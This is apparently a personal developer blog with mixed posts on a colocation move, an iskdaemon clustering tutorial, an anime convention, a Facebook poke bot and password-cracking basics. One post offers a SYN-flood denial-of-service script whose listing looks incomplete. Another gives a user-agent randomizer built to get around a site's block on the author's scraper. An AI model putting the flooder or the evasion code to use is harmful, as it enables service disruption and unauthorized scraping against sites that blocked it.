A Blog About Anime, Code, and Pr0 H4x

From the Basement to the Data Center

September 17, 2014 at 06:13 AM

Studio Bebop has been growing a lot over the last year. We're now incorporated, and last week moved all of our server equipment into our very own (colocation) data center!

Before I get into the big data center move, I first have to rewind back to early 2013 and my first foray into hosting my own servers. At the time I was developing a price comparison website (like Expedia or Kayak) for PVC figures from anime and video games, called Figure Stalk (which is still under development FYI).

The core component of what makes Figure Stalk run is an image matching engine that compares images of potential product matches on other vendor websites with the images on a source product page you'd feed into the website. (If you'd like to know more about the image matching engine stuff, you should take a peek at this blog post I wrote about it.) The only problem is that the image matching engine requires a fairly large amount of RAM to play with in order to be fast enough to be more than a proof of concept, and at the time all of Studio Bebop's hosting needs were being facilitated with VPS servers from Linode, who while great for what they do, weren't really equipped to meet our needs for this project (at least without costing me an arm and a leg).

So after crunching the numbers, I decided to throw caution to the wind and bought the components for a manly man server with RAM for days. Two weeks, a couple orders for missing components, and a loving kernel configuration later, Bebop3 was born! In the interest of brevity I won't bore you with all the hardware details; suffice it to say that Bebop3 ended up with 96 GB of RAM, 2x 2.0 GHz 8-core CPUs, an SSD for the OS and DB, and a 1 TB WD Red for holding all the static content.

Armed with my new super server, I was then faced with the task of finding a nice fat pipe and a static IP to hook it up to, somewhere close enough to where I lived that I could get to it for maintenance, but far enough away that my apartment didn't end up looking like an episode of Serial Experiments Lain. At the time I was unaware that colocation was even a thing, so I ended up signing a three year agreement for business class internet with Comcast. The package I was able to get with them was for 1 static IP, 20 Mb/s up, and 50 Mb/s down for $225 a month, and while not ideal, it at least got the job done and was the best option I had available to me at the time.

Or rather I should say, it got the job done until a month or so later when I launched Yugioh Prices, which in turn took off like a rocket and quickly maxed out my measly 20 Mb/s up speed. As time went on and Yugioh Prices continued to grow in popularity, I ended up working around my bandwidth limitations with Comcast by hosting the Yugioh card images that were eating up all of my bandwidth on 4 separate Linodes, and using a round-robin load balancing strategy to split the load over the four. (Because even though Linode had the bandwidth to serve the images without a problem, they limited me to 4 TB a month of outgoing data per VPS, and on a heavy month we'd push out at least 12 to 13 TB in Yugioh card images.)
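For the curious, here's a quick back-of-the-envelope check on those numbers. It's only a sketch: it assumes a 30-day month, decimal units (1 TB = 10^12 bytes), and a link that stays saturated around the clock, and monthly_tb is just a helper name I made up for the example.

```python
# Back-of-the-envelope bandwidth math (assumes a 30-day month and decimal units).
SECONDS_PER_MONTH = 30 * 24 * 60 * 60

def monthly_tb(megabits_per_second):
    """Most data (in TB) a link can move in a month if it is saturated 24/7."""
    bytes_per_second = megabits_per_second * 1000000 / 8.0
    return bytes_per_second * SECONDS_PER_MONTH / 1e12

comcast_cap_tb = monthly_tb(20)   # the 20 Mb/s upload from the Comcast plan
per_linode_tb = 13 / 4.0          # a heavy 13 TB month split evenly over 4 Linodes

print("20 Mb/s saturated all month: %.2f TB" % comcast_cap_tb)
print("Per-Linode share of 13 TB:   %.2f TB (cap is 4 TB)" % per_linode_tb)
```

In other words, even a fully saturated 20 Mb/s uplink tops out at roughly half of what the card images alone needed on a heavy month, while an even four-way split keeps each Linode under its 4 TB cap.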

This setup would have been ideal if Yugioh Prices and Figure Stalk were the only things that Bebop3 was hosting, but after about a year the machine had become the primary back-end workhorse for Studio Bebop, hosting 18 different websites and support APIs for our various products. After seeing top stats like these as the norm last month, I knew it was time once again to invest in more server hardware. This investment took the form of Bebop6, a clone of Bebop3, but with much scarier fans.

With Bebop6 in tow, I gave Comcast the boot (well more like just unplugged everything and agreed to keep paying them because they've got me locked in a contract for another 18 months :/), and signed up with Fibernet here in Orem. I cannot overstate how impressed I am with Fibernet, and how excited I am to have my servers housed in their data center. After hacking around with trying to do it myself with a mobile rackmount tank at my aunt and uncle's house in Spanish Fork, it is a huge relief to finally be in a real data center!

I've signed up for Fibernet's full cabinet bundle, which gets me:

  • 48 U of rack space to work with
  • 100 Mb/s in bandwidth up and down (symmetric, and unlimited)
  • 4 Static IPs
  • And a cold basement room to stash my servers in that has enough locks and fingerprint readers to give even Michael Westen from Burn Notice a hard time.

Phew, well that's enough background on why I ended up moving my server hardware into a data center, so how about some pictures already!

Oh, and just in case you're wondering why the left fan on Bebop3 isn't spinning, it's because I accidentally got a little too close to it while it was running, and it ended up sucking one of the cuff buttons right off of my jacket, which it then proceeded to snap two of its blades off on. Now that's the kind of excessive cooling power every server should have, grunt grunt.

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances

March 13, 2013 at 12:00 PM

imgSeek (and its server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.

For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.

Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.

As you can see, imgSeek definitely works, and it works pretty well too. However, don't let my super awesome app promo fool you: there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such suffers from bugs, hiccups, and scary segmentation faults.

Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" within the default iskdaemon configuration file, it isn't actually an implemented feature yet. As such, if you hit a stock copy of iskdaemon with lots of requests at a time, you're going to start to see some serious lag due to the fact that at the moment a stock copy of iskdaemon can only process one request at a time. So if it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)
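To make that latency math concrete, here's a tiny sketch. It's a deliberately simplified model (every request takes the same amount of time, and each worker handles exactly one request at a time), and worst_case_wait is a name I made up for this example, not something from iskdaemon.

```python
def worst_case_wait(queued_requests, seconds_per_request, workers=1):
    """Seconds until the last queued request finishes.

    Simplified model: every request takes the same time and each worker
    handles one request at a time.
    """
    # Ceiling division: how many rounds of work the last request sits through.
    rounds = -(-queued_requests // workers)
    return rounds * seconds_per_request

for workers in (1, 12):
    print("%2d worker(s): %d s" % (workers, worst_case_wait(30, 1, workers)))
```

With thirty one-second requests in the queue, a single instance leaves the last caller waiting about thirty seconds, while twelve instances working in parallel bring that down to about three.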

Luckily for all of you, I've taken it upon myself to implement fixes for all of these gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!

Clustered Access Layout

The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then, you use Nginx (or whatever HTTP daemon floats your boat), to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...

The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other. By which I mean that some nodes will have an image, while others won't. Moreover, once you start trying to save/load to the same database file things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.

To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.

Implementing the separate writer instance was pretty straightforward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In this next section I'll be going over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.

Overcoming Database Inconsistencies With Multiple Iskdaemon Instances

Clustered access layout with separate writer instance.

The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.

So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.

Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.

Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.
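If you'd rather read code than a chart, the same steps can be sketched in a few lines of Python. To be clear, this is not the actual iskdaemon-clustered source: reload_if_changed and load_db are hypothetical names, the change check uses the file's modification time (an assumption on my part), and the retry is a bounded loop rather than the recursion described above.

```python
import os
import shutil
import tempfile

def reload_if_changed(db_path, last_mtime, load_db, max_attempts=5):
    """Reload the database if db_path changed since last_mtime.

    Returns (db, mtime); db is None when nothing changed.
    load_db is a hypothetical callable that parses a database file.
    """
    mtime = os.path.getmtime(db_path)
    if mtime == last_mtime:
        return None, last_mtime      # nothing new, keep the in-memory copy

    for _ in range(max_attempts):
        # Read from a private snapshot instead of the live database file.
        fd, tmp_path = tempfile.mkstemp(suffix=".isk-db")
        os.close(fd)
        try:
            shutil.copyfile(db_path, tmp_path)
            return load_db(tmp_path), mtime
        except (IOError, OSError, ValueError):
            continue                 # snapshot was unreadable, try again
        finally:
            os.remove(tmp_path)      # always clean up the temporary copy
    raise RuntimeError("could not reread %s after %d attempts"
                       % (db_path, max_attempts))
```

A reader would call something like this at the top of every query, holding on to the returned mtime for the next call. Capping the number of attempts is a design choice on my part: it trades the "keep trying until it works" behavior for a guarantee that a permanently broken file can't hang a reader forever.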

Installing iskdaemon-clustered On Your Server

Please note that the following instructions are for compiling/installing on a *nix system. You're on your own, Windows users.

First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)

  • git
  • nginx
  • python version >= 2.5 (but not 3.0 yuck!) and python development libraries
  • python twisted matrix libs 8.x or later
  • python SOAPpy package 0.12
  • C/C++ compilers
  • libmagick
  • libmagick++
  • SWIG

Next, clone the iskdaemon-clustered Github repository.

git clone https://github.com/StudioBebop/iskdaemon-clustered.git

Now compile iskdaemon-clustered!

$ cd iskdaemon-clustered
$ cd src
$ python setup.py build
$ sudo python setup.py install

Now assuming that you have all of the necessary prerequisites, and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.

Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a Python script (launch-clustered-isk.py) that handles the launching for you (again it's a little hacky, but it gets the job done without too much work).

First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)

cp iskdaemon-clustered/launch-clustered-isk.py ~

launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peek at its configuration options.

Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are where you can make adjustments if you need/want to. Each line is commented, but I'll give you a quick overview anyway.

  • instance_count = 13
    This sets how many instances of iskdaemon.py you'd like to launch. With the default configuration 13 instances will be launched. 1 for writing, and 12 for reading.
  • start_port = 1336
    This sets the port to start your instances listening on. With each instance the listening port will be incremented by 1.
    • Instance 1 - listens on port 1336
    • Instance 2 - listens on port 1337
    • Instance 3 - listens on port 1338
  • execpath = "/usr/bin/iskdaemon.py"
    This sets the path to iskdaemon.py. The default value should work, but you will need to adjust it if you ended up installing iskdaemon.py somewhere else.
  • isk_root = os.path.join(os.path.abspath("."), "isk-cluster")
    This sets the path that will be created to hold all of the iskdaemon cluster files. You should probably leave this line alone.
  • iskdbpath = os.path.join(os.path.abspath("."), "isk-db")
    This sets the path to the main iskdaemon image database file. You should probably leave this line alone.
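To see how instance_count and start_port turn into actual ports, here's a small sketch using the default values above. It isn't lifted from launch-clustered-isk.py; upstream_block is a helper I made up for illustration, and it assumes (as the rest of this post does) that the first port belongs to the writer and the rest belong to the readers.

```python
instance_count = 13   # defaults from launch-clustered-isk.py
start_port = 1336

ports = [start_port + i for i in range(instance_count)]
writer_port = ports[0]      # first instance handles writes
reader_ports = ports[1:]    # the rest sit behind the Nginx proxy

def upstream_block(name, reader_ports):
    """Render an Nginx upstream block listing every reader instance."""
    lines = ["upstream %s {" % name]
    lines += ["    server localhost:%d;" % port for port in reader_ports]
    lines.append("}")
    return "\n".join(lines)

print("writer: %d" % writer_port)
print(upstream_block("isk-cluster", reader_ports))
```

If you change instance_count or start_port, the list of reader ports you hand to Nginx has to change with them, which is the main reason to generate it rather than type it out by hand.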

Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.

Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.

http {
    upstream isk-cluster {
        server localhost:1337;
        server localhost:1338;
        server localhost:1339;
        # ... skipping some lines, and assuming you configured 12 reader instances
        server localhost:1346;
        server localhost:1347;
        server localhost:1348;
    }

    # listen on localhost on port 81
    server {
        listen 81;
        server_name localhost;
        location / {
            proxy_pass http://isk-cluster;
        }
    }
}

Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.

Assuming everything went as planned, you should now be able to access your iskdaemon read cluster from http://localhost:81, and your writing instance via http://localhost:1336. Have fun!
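On the client side, the only thing you have to remember is which calls go where. Here's a minimal sketch of that routing, using the default ports from this post. endpoint_for is a made-up helper, and treating saveDb as a write call is my own assumption based on what it does.

```python
READ_URL = "http://localhost:81"      # Nginx proxy in front of the readers
WRITE_URL = "http://localhost:1336"   # dedicated writer instance

# Write-style calls mentioned in this post; anything else goes to the readers.
WRITE_METHODS = {"addImg", "addImgBlob", "saveDb"}

def endpoint_for(method_name):
    """Pick the base URL a given iskdaemon call should be sent to."""
    return WRITE_URL if method_name in WRITE_METHODS else READ_URL

for name in ("queryImgID", "queryImgBlob", "addImgBlob", "saveDb"):
    print("%-12s -> %s" % (name, endpoint_for(name)))
```

Sending a write through the proxy by accident is exactly what causes the database inconsistencies described earlier, so it's worth putting this decision in one place instead of sprinkling URLs all over your client code.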

Miscellaneous Tips and Information

  • launch-clustered-isk.py isn't a daemon process. If you want to launch and forget it, do what I do, and launch it in a screen.

    $ screen
    $ ./launch-clustered-isk.py &
  • launch-clustered-isk.py uses infinite loops to keep your various iskdaemon instances running, even if they crash. If you want to shut down your iskdaemon cluster, execute the following commands.

    $ killall launch-clustered-isk.py
    $ killall iskdaemon.py
  • I've modified the queryImgBlob and addImgBlob functions a little bit. To use them, send them base64 encoded image data. I did this so that I could use these functions with Ruby's default XMLRPC library.
  • An additional way you can give your iskdaemon instances a boost is by renicing them. To renice your entire iskdaemon cluster, execute the following command.

    $ echo renice -n -10 -p `echo \`pgrep iskdaemon.py\` | sed -e 's/ / /g'` | sudo /bin/bash
  • Iskdaemon and iskdaemon-clustered are resource monsters. Make sure you have the hardware resources necessary to run things smoothly. You don't want to be dipping heavily into swap space because you ran out of RAM.
    • I'm running my iskdaemon cluster on a server with 64 GB of RAM and an SSD for the database files.
  • I use iskdaemon-clustered in the following projects.

  • If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!
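Regarding the tip above about queryImgBlob and addImgBlob wanting base64 encoded image data, here's roughly what the encoding step looks like from Python. This is only a sketch: encode_image and decode_image are names I made up, and the bytes are a placeholder rather than a real image.

```python
import base64

def encode_image(raw_bytes):
    """Base64-encode raw image bytes into an ASCII string for an XML-RPC call."""
    return base64.b64encode(raw_bytes).decode("ascii")

def decode_image(encoded):
    """Reverse of encode_image, shown here only to check the round trip."""
    return base64.b64decode(encoded)

fake_image = b"\x89PNG\r\n\x1a\n not a real image"   # placeholder bytes
payload = encode_image(fake_image)
print(payload)
```

The resulting string is what you'd pass as the image argument; plain ASCII survives the trip through just about any XML-RPC library, which is the whole point of the change.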

SYNFlood.py - A multithreaded SYN Flooder

January 18, 2013 at 12:00 PM

I wrote this script a long time ago when I was just starting to learn about networking basics. During that time, I came across a Python library that makes it easy to craft and manipulate network traffic at a packet level by the name of Scapy.

I wrote this script as a demonstration of a SYN/ACK Three Way Handshake Attack as discussed by Halla of Information Leak in an article that has since mysteriously disappeared from his site. I also mentioned this script in an article I wrote about hacking gibsons or something to that effect, that I have since removed from this site because the writing in it was atrocious. (Well it was written by a ninth grader, so that's not a huge surprise.)

Anyway, aside from searches for the phrase "How can you say you love her if you can't even eat her poop?" (oh yeah, I'm an SEO master), the majority of external search engine hits to my website come from people looking for this script. Therefore, I decided I'd spruce it up a touch, and repost it in all of its glory here.

So without further ado, gaze and behold!

#!/usr/bin/env python
# SYNflood.py - A multithreaded SYN Flooder
# By Brandon Smith
# brandon.smith@studiobebop.net
# This script is a demonstration of a SYN/ACK 3 Way Handshake Attack
# as discussed by Halla of Information Leak
import socket
import random
import sys
import threading
#import scapy # Uncomment this if you're planning to use Scapy
# Global Config
interface    = None
target       = None
port         = None
thread_limit = 200
total        = 0
#!# End Global Config #!#
class sendSYN(threading.Thread):
        global target, port
        def __init__(self):
        def run(self):
                # There are two different ways you can go about pulling this off.
                # You can either:
                #   - 1. Just open a socket to your target on any old port
                #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
                # (Uncomment whichever method you'd like to use)
                # Method 1 -
#               s = socket.socket()
#               s.connect((target,port))
                # Method 2 -
#               i = scapy.IP()
#               i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
#               i.dst = target
#               t = scapy.TCP()
#               t.sport = random.randint(1,65535)
#               t.dport = port
#               t.flags = 'S'
#               scapy.send(i/t, verbose=0)
if __name__ == "__main__":
        # Make sure we have all the arguments we need
        if len(sys.argv) != 4:
                print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
        # Prepare our variables
        interface        = sys.argv[1]
        target           = sys.argv[2]
        port             = int(sys.argv[3])
#       scapy.conf.iface = interface # Uncomment this if you're going to use Scapy
        # Hop to it!
        print "Flooding %s:%i with SYN packets." % (target, port)
        while True:
                if threading.activeCount() < thread_limit:
                        total += 1
                        sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)

Download: SYNFlood.py

A First World Problem Is Still A Problem

January 3, 2013 at 12:00 PM

I went to Ikkicon last weekend with my younger brother and a few of my friends, and it was a lot more fun than it was last year. I spent a lot of money, I learned a great many things, and had a wonderful time.

Here are the highlights.

If you're going to buy one thing, you might as well buy six!

Some of you may be familiar with "The Slippery Slope", i.e. the practice of buying figures and other such merchandise from various anime, manga, and video games. Well I've been riding down that particular incline for a few years now, and as I get older and make more money, my collection only grows more and more powerful.

Anyway, I thought that I had bought a lot of figures this year at San-Japan, but my haul from Ikkicon this year (pictured on the right) blew that collection out of the water! Here's a quick breakdown of what I bought.

Now while this haul from Ikkicon is pretty darn awesome (though it would have been better if I could have found an Elsie figure), I'm faced with a serious problem. I don't have anywhere to put these new figures! My current shelf situation has just about reached critical mass, but I have a plan!

When I get back to my apartment on Friday, I'm going to bust out some serious feng shui on my room. What I want to do is get two or three of these DETOLF glass display cabinets from IKEA, and then rig up some cool LED lighting in them as outlined by this article. I've seen examples of other people's collections who have taken this approach, and it looks pretty awesome. I've got the skills and cash necessary to execute a project like this, now I just need to figure out how to fit it all in to my room, and still be able to sleep.

That boy ain't right.

This one came way out of nowhere. The guy who played the voice of John Redcorn from King of the Hill was at Ikkicon. He was signing autographs, and selling John Redcornchips. I bought a bag, and got him to say a few lines from the show. It was a cool experience, but it's also such an odd thing to see at an anime convention, that you just gotta laugh.

The Game Room

One thing that has always been way hit or miss for me at cons, is the game room. This year Ikkicon's game room was pretty meh. They had a few consoles and you could pick a few games to play which was nice, but the TVs were way too small, and Melee was straight up banned. There was a little Rock Band station set up, but that's kinda hard to get into when you can barely hear the music. There was also a rigged up Stepmania (DDR for PC) game, and that was it.

I wish Ikkicon would do what they did a few years ago, and have 20 or so PCs setup on a LAN, and just have everyone play Unreal Tournament and Call of Duty. That was waaaaaay more fun. It wasn't that the game room was terrible or anything, it just wasn't very good.

If I were in charge of setting up the ideal game room for a con, here's what I'd have.

  • Consoles on something bigger than fifteen inch displays.
  • One or two DDR or Stepmania machines.
  • A Street Fighter arcade cabinet.
  • 16 - 20 PCs with Unreal Tournament, Call of Duty, and/or some other fast paced multiplayer games. (Tribes :D)
  • A Dance Maniax machine.
  • Melee tournament on Friday.
  • Brawl tournament on Saturday.
  • DDR tournament on Saturday night.

Dubs in my VN? It's more likely than you think.

We went to a panel on Saturday about dubbing visual novels. This was a subject that had us scratching our heads, as we had never heard of anything like this before. Well apparently it's a thing, albeit a pretty small one. The panel itself was more focused on how to not suck at being a professional voice over talent, and was very interesting.

I'm pretty sure the panel was being run by the people from Sake Visual, and we were able to learn all about non-Japanese visual novels, and about the English VN dubbing scene. I ended up buying some stuff from them later that day after the panel (pictured left).

The game at the top in the picture is Koenchu, and it's the only one that I've played so far. I started out playing it with the English dub on, but I didn't like it. To be fair, it's a game about being in a school for becoming a voice actor in Japan, so it would be pretty hard to make a dub that would be able to really capture the essence of moe moe Japanese seiyuu.

The bottom two games are a series of detective games that was developed here in the US by Sake Visual. I'm excited to play these two. They were described to me as being kind of like Phoenix Wright mixed with Higurashi, which sounds like a pretty sweet combo. From what I've seen from the art shown off by the about page on the Sake Visual website, the art looks like it'll be pretty good. I just hope that the dub is decent too.

Nerdcore Comedy

Ikkicon had a nerdcore comedy show this year, and it was pretty good. We were late and missed the first act, but the second guy was pretty good, and he totally made fun of these super saiyan level loud dudes that were sitting right behind us. The final act was Alex "KOOLAID" Ansel, and he was great. My brother and I saw him at San-Japan earlier this year, and he was even better this time at Ikkicon. He performed for a long time, told some jokes I hadn't heard from him before, and was all around awesome. I even picked up a copy of his bootleg.

The End.

Pokebot (poh-kay-bot) - A Facebook Poke Autoresponse Bot

January 3, 2013 at 12:00 PM

== Source code available on my Github. ==

A friend of mine asked me to write him a bot that would automatically poke back anyone who poked him on Facebook, so that's what I did.

This bot doesn't make use of any of the actual Facebook APIs, but instead performs all of its actions by mimicking the behavior of an actual web browser. I designed it this way for three reasons.

  1. I was bored and enjoy a challenge.
  2. It takes me back to my days as a freelance spam bot developer.
  3. Working with official APIs can be messy when you have to deal with getting access tokens, and the possibility of having your access revoked if your actions are deemed excessive. So while it's not nearly as straightforward as working with the official API, mimicking a web browser does have its perks.



Assuming you meet all the requirements listed above, all you need to do is run main.py. Pokebot will ask for your Facebook email and password, as well as an amount of time to wait between checking for pokes. Once all of that information is squared away, Pokebot will run on a continuous loop until you tell it to stop.


ZDNet Did An Article on My Article, or Holy Crap I'm Famous!

October 24, 2012 at 12:00 PM

Granted I'm slowpoking super hard on this, but holy crap!

There is an article over on ZDNet about heuristic password cracking that is pretty much based entirely on my article "Building the Better Brute Force Algorithm", which was published in 2600: The Hacker Quarterly last July!

Not only that, but it uses direct quotes from my article, as well as paraphrasing, and even mentions my name!

That's so awesome!

Check it out!

Randomized User Agent Header Generator

October 24, 2012 at 12:00 PM

I put together a scraping bot for a website I frequent occasionally, but they got wise to my Python shenanigans after I released the source code (who'd have thought?), so I had to step up my bot code a bit.

After some tinkering I found that they had just blacklisted the user agent header I was using for the script, instead of doing something more effective like setting access timers between page requests, or getting strict on referer headers, or just banning my account.

But I digress...

Since all they did was ban the user agent string I was using before, all I had to do was change it, and I was back in business. But in the long run this isn't really the best solution since they could always just ban the user agent header again. So instead I decided to throw together a quick Python function that generates a randomized, realish looking user agent header.

Gaze and behold!

import random

def get_random_useragent():
    base_agent = "Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) Gecko/%d0%d Firefox/%.1f.%.1f"
    return base_agent % ((random.random() + 5),
                         (random.random() + random.randint(1, 8)), random.random(),
                         random.randint(2000, 2100), random.randint(92215, 99999),
                         (random.random() + random.randint(3, 9)), random.random())

>>> print get_random_useragent()
Mozilla/5.2 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009098692 Firefox/
>>> print get_random_useragent()
Mozilla/5.5 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2006095233 Firefox/
>>> print get_random_useragent()
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2064093484 Firefox/
>>> print get_random_useragent()
Mozilla/5.6 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2063099117 Firefox/

I hope someone out there besides me can find a use for this.
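If you're wondering how you'd actually plug this into a script, here's a rough sketch that attaches a fresh user agent to a request. A few caveats: it's written for Python 3's urllib.request (not the Python 2 I used for the original), build_request is a made-up helper, and the URL is just a placeholder. It builds the request without sending anything.

```python
import random
import urllib.request

def get_random_useragent():
    """Python 3 flavored copy of the generator from this post."""
    base_agent = ("Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) "
                  "Gecko/%d0%d Firefox/%.1f.%.1f")
    return base_agent % ((random.random() + 5),
                         (random.random() + random.randint(1, 8)), random.random(),
                         random.randint(2000, 2100), random.randint(92215, 99999),
                         (random.random() + random.randint(3, 9)), random.random())

def build_request(url):
    """Build (but don't send) a request carrying a fresh random User-Agent."""
    return urllib.request.Request(url, headers={"User-Agent": get_random_useragent()})

request = build_request("http://example.com/")   # placeholder URL
print(request.get_header("User-agent"))
```

Calling build_request once per page fetch gives every request its own header, so there's no single string left to blacklist.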

Download: random_useragent.py

Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking

July 23, 2012 at 12:00 PM

As seen in the Summer 2012 edition of 2600: The Hacker Quarterly.

Let's begin with a brief overview of standard (non-decryption based) password cracking methods. When faced with the task of cracking a password hash, and reverse engineering the encryption algorithm used to create the hash of the original password isn't a viable choice, you are left with a couple of different options.

Dictionary Attacks

A dictionary attack is carried out by iterating through a list of words, creating a hash of each one, and comparing the result to your target hash until you find a match. While dictionary based cracking methods can be used to crack a lot of common passwords, they're not all that effective when things start to become more complicated.

Often people use one or more words in their password, and those words may or may not be separated by a space or contain numbers or punctuation. Take for example, the password "falconpunch". It contains the two words "falcon" and "punch". Both of these words are found in a standard list of dictionary words, but you wouldn't be able to crack this password using a dictionary attack, because they're mashed together to form a single 'word'.

We also run into the same issue with passwords that are made up of, or include, portmanteaus that are not generally found in dictionary lists. Take for instance the portmanteau made from combining the words "char" and "lizard". Chances are pretty good that your dictionary list doesn't include the word "charizard", thus rendering a dictionary attack not very effective for that password.
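To make that concrete, here's a minimal Python 3 sketch of a dictionary attack. The use of MD5 and the four-word list are assumptions made purely for illustration; swap in whatever hash function and word list your target calls for.

```python
import hashlib


def md5_hex(text):
    """Return the hex MD5 digest of a string (MD5 is just an example hash)."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def dictionary_attack(target_hash, words):
    """Hash each candidate word and return the first one that matches."""
    for word in words:
        if md5_hex(word) == target_hash:
            return word
    return None  # no word in the list produced the target hash


# A toy word list standing in for a real dictionary file.
words = ["falcon", "punch", "char", "lizard"]

print(dictionary_attack(md5_hex("falcon"), words))       # falcon
print(dictionary_attack(md5_hex("falconpunch"), words))  # None
```

The second lookup comes back empty because "falconpunch" never appears in the list as a single word, even though both of its halves do.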

Brute Force Attacks

When dictionary attacks just won't do, you can always try cracking the password using the brute force method. A brute force attack is carried out by cycling through every possible combination of a sequence of characters (aaaa, aaab, aaac, etc), and hashing each one until you find the sequence whose hash matches your target hash.
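A bare-bones brute force loop might look something like the sketch below (Python 3). MD5, the a-z alphabet, and the `max_length` cutoff are all assumptions for the sake of the example.

```python
import hashlib
from itertools import product
from string import ascii_lowercase


def md5_hex(text):
    """Return the hex MD5 digest of a string (MD5 is just an example hash)."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def brute_force(target_hash, alphabet=ascii_lowercase, max_length=4):
    """Try every string over `alphabet`, shortest first, up to max_length."""
    for length in range(1, max_length + 1):
        # product() walks the sequences in order: aaa, aab, aac, ...
        for combo in product(alphabet, repeat=length):
            candidate = "".join(combo)
            if md5_hex(candidate) == target_hash:
                return candidate
    return None  # nothing up to max_length matched


print(brute_force(md5_hex("abc"), max_length=3))  # abc
```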

The benefit of using a brute force attack is that, given enough time, it has a 100% chance of cracking your password hash. The downside is that iterating through every possible combination of a sequence of characters until you find a match for your target hash could end up taking a very long time, and it only gets worse the longer and more complicated your target password is.

Take for example the password "charizard rules". That's a password that is 15 characters long, and only contains letters and spaces. Simple right? Well in order to crack this password using a brute force attack, you would need to iterate through every possible combination of the letters a-z and the space (" ") character from a length of one to at least fifteen characters. Let's do some math to see just how many combinations (in theory) we would have to try.


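Length        Total Combinations
1 (27^1)      27
2 (27^2)      729
3 (27^3)      19,683
4 (27^4)      531,441
5 (27^5)      14,348,907
6 (27^6)      387,420,489
7 (27^7)      10,460,353,203
8 (27^8)      282,429,536,481
9 (27^9)      7,625,597,484,987
10 (27^10)    205,891,132,094,649
11 (27^11)    5,559,060,566,555,523
12 (27^12)    150,094,635,296,999,121
13 (27^13)    4,052,555,153,018,976,267
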